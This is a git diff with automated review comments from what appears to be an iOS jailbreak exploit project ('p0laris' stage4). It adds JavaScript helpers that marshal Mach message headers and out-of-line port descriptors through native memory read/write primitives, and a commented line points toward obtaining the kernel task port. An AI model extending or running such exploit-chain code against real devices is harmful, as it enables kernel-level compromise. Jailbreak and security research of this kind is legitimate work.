-rw-r--r--src/stage4/lib/mach.js6
-rw-r--r--src/stage4/lib/native_ptr.js51
-rw-r--r--src/stage4/lib/str.js9
-rw-r--r--src/stage4/main.js13
4 files changed, 70 insertions, 9 deletions
diff --git a/src/stage4/lib/mach.js b/src/stage4/lib/mach.js
new file mode 100644
index 0000000..d9e6b6a
--- /dev/null
+++ b/src/stage4/lib/mach.js
@@ -0,0 +1,6 @@
+function MACH_MSGH_BITS(remote, local) {
+ return ((remote) | ((local) << 8));
+}
+
+var MACH_MSGH_BITS_COMPLEX = 0x80000000;
+var MACH_MSG_TYPE_MAKE_SEND_ONCE = 21; \ No newline at end of file
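Review bot: `MACH_MSGH_BITS_COMPLEX` is `0x80000000`, and JavaScript's `|` produces a signed 32-bit result, so the value composed in main.js (`MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)`) is a negative number; whether that survives serialization depends on how `u32xn_to_u8xn` (not in this diff) treats negatives, and reading it back through `Uint32Array` in `mach_msg_header_t_buf_to_obj` yields the unsigned form, so the round trip will not compare equal. Callers should normalize the combined word, `Head_obj.msgh_bits = (MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)) >>> 0;`, or the helper could document that its result is meant to be combined and then forced unsigned. A one-line comment on the packing would also help, `// low byte: remote, next byte: local (shifted by 8)`. The new file also lacks a trailing newline.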
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index aa79130..1ae7644 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -5,8 +5,6 @@ class native_ptr {
this.count = arguments[0];
var our_proto = Object.getPrototypeOf(this);
- p0laris_log(JSON.stringify(Object.getPrototypeOf(this)));
-
if (our_proto.predef == true) {
this.size = our_proto.size;
this.buf_to_obj = our_proto.buf_to_obj;
@@ -44,6 +42,8 @@ class native_ptr {
n = 0;
}
+ var buf_yahtzee = read_buf(this.addy + (n * this.size), this.size);
+
return this.buf_to_obj(read_buf(this.addy + (n * this.size), this.size));
}
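Review bot: The added `buf_yahtzee` variable is assigned but never used, and the `return` on the next line calls `read_buf` a second time with the same arguments, so every `deref` now reads the memory twice; the fix is `return this.buf_to_obj(buf_yahtzee);` (or dropping the added line). A second read also means the returned object may not reflect the bytes observed by the first read if the underlying memory changes between the calls. The enclosing method begins outside the hunk.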
@@ -140,6 +140,20 @@ function u32xn_to_u8xn(buf) {
return ret;
}
+function u8xn_to_u32xn(buf) {
+ var ret = new Uint32Array(buf.length >>> 2);
+
+ for (var i = 0; i < buf.length; i += 4) {
+ var tmp = [buf[(i) + 0],
+ buf[(i) + 1],
+ buf[(i) + 2],
+ buf[(i) + 3]];
+ ret[i >> 2] = u8x4_to_u32(tmp);
+ }
+
+ return ret;
+}
+
/*
typedef struct{
mach_msg_bits_t msgh_bits;
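Review bot: `u8xn_to_u32xn` silently mishandles a `buf` whose length is not a multiple of 4: `ret` is sized `buf.length >>> 2`, so the final partial group is read with `undefined` entries and its store to `ret[i >> 2]` is out of range and dropped by the typed array. Make the contract explicit with a guard, `if (buf.length % 4 !== 0) throw new Error("u8xn_to_u32xn: buf length must be a multiple of 4");`, and add a comment stating that byte order is whatever `u8x4_to_u32` (not in this diff) implements. The `(i) + 0` … `(i) + 3` parentheses are macro-style leftovers and can be plain `i`, `i + 1`, …; since `u32xn_to_u8xn` just above is presumably the inverse, the pair deserves a shared header comment.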
@@ -151,13 +165,38 @@ typedef struct{
} mach_msg_header_t;
*/
function mach_msg_header_t_buf_to_obj(buf) {
- var ret = new Uint8Array(24);
+ var arr = u8xn_to_u32xn(buf);
+ var ret = {};
+
+ ret.msgh_bits = arr[0];
+ ret.msgh_size = arr[1];
+ ret.msgh_remote_port = arr[2];
+ ret.msgh_local_port = arr[3];
+ ret.msgh_voucher_port = arr[4];
+ ret.msgh_id = arr[5];
+
+ return ret;
}
-function Request_sp_buf_to_obj(buf) {
+function mach_msg_header_t_obj_to_buf(obj) {
+ var arr = [obj.msgh_bits,
+ obj.msgh_size,
+ obj.msgh_remote_port,
+ obj.msgh_local_port,
+ obj.msgh_voucher_port,
+ obj.msgh_id];
+ var ret = u32xn_to_u8xn(arr);
+ return ret;
+}
+
+function Request_sp_buf_to_obj(buf) {
+// var arr = [buf.msg]
}
+var mach_msg_header_t = native_ptr_type(24,
+ mach_msg_header_t_buf_to_obj,
+ mach_msg_header_t_obj_to_buf);
var mach_msg_ool_ports_descriptor_t = native_ptr_type(12,
- mach_msg_ool_ports_descriptor_t_buf_to_obj,
- mach_msg_ool_ports_descriptor_t_obj_to_buf); \ No newline at end of file
+ mach_msg_ool_ports_descriptor_t_buf_to_obj,
+ mach_msg_ool_ports_descriptor_t_obj_to_buf); \ No newline at end of file
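Review bot: `Request_sp_buf_to_obj` is left as a function with an empty body and one commented-out line, so any `native_ptr_type` registered with it would have `deref()` return `undefined` instead of an object; either remove the stub until it is implemented or make it fail loudly, `throw new Error("Request_sp_buf_to_obj: not implemented");`, and replace the commented-out line with a `// TODO(owner): …` naming the layout still to be decoded. `mach_msg_header_t_buf_to_obj` and `mach_msg_header_t_obj_to_buf` would benefit from a short header comment stating that the six `u32` fields in declaration order are exactly the 24 bytes passed to `native_ptr_type(24, …)`, since that coupling is what keeps `deref()` and `write()` consistent. `mach_msg_header_t_obj_to_buf` also forwards whatever is on `obj`, so a field missing from the object reaches `u32xn_to_u8xn` as `undefined`; document that all six fields are required, or default them (`obj.msgh_voucher_port || 0`) in the file's `var`-era style.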
diff --git a/src/stage4/lib/str.js b/src/stage4/lib/str.js
new file mode 100644
index 0000000..3d543a0
--- /dev/null
+++ b/src/stage4/lib/str.js
@@ -0,0 +1,9 @@
+function dump_u32xn(buf) {
+ var s = "";
+
+ for (var i = 0; i < buf.length; i++) {
+ s += pad_left(buf[i].toString(16), "0", 8);
+ }
+
+ return s;
+} \ No newline at end of file
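Review bot: `dump_u32xn` calls `buf[i].toString(16)` directly, so if `buf` is a plain array holding values produced by JavaScript bitwise operators (signed 32-bit, e.g. anything OR'ed with `0x80000000`) the element prints with a leading `-` and the `pad_left` to 8 columns no longer lines up; `(buf[i] >>> 0).toString(16)` normalizes each word to its unsigned form first. A one-line JSDoc would make the output format explicit: `/** Hex-dump an array of 32-bit words as 8-digit zero-padded hex, no separators. */`. `pad_left` is not in this diff; its `(str, padChar, width)` argument order is inferred from the call and should be confirmed.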
diff --git a/src/stage4/main.js b/src/stage4/main.js
index b24f52b..ce470f9 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -55,8 +55,6 @@ function main() {
sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
prep_shit();
- p0laris_log("%s", prim_hexdump(u32xn_to_u8xn([0x41424344, 0x45464748, 0x494a4b4c, 0x4d4e4f50])));
-
var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
var addy = init_port_set.addy;
var init_port_set_obj = init_port_set.deref();
@@ -65,7 +63,6 @@ function main() {
init_port_set_obj.disposition = 19;
init_port_set_obj.deallocate = false;
init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- p0laris_log("%x", addy);
init_port_set.write(init_port_set_obj, 0);
init_port_set.write(init_port_set_obj, 1);
init_port_set.write(init_port_set_obj, 2);
@@ -74,6 +71,16 @@ function main() {
JSON.stringify(init_port_set.deref(1)),
JSON.stringify(init_port_set.deref(2)),
JSON.stringify(init_port_set.deref(3)));
+
+ var Head = new mach_msg_header_t();
+ var addy = Head.addy;
+ var Head_obj = Head.deref();
+ Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ Head_obj.msgh_remote_port = 0x41424344;
+ Head_obj.msgh_local_port = 0x45464748;
+ Head_obj.msgh_id = 1337;
+ Head.write(Head_obj);
+ p0laris_log("%s", JSON.stringify(Head.deref()));
// var tfp0 = get_kernel_task();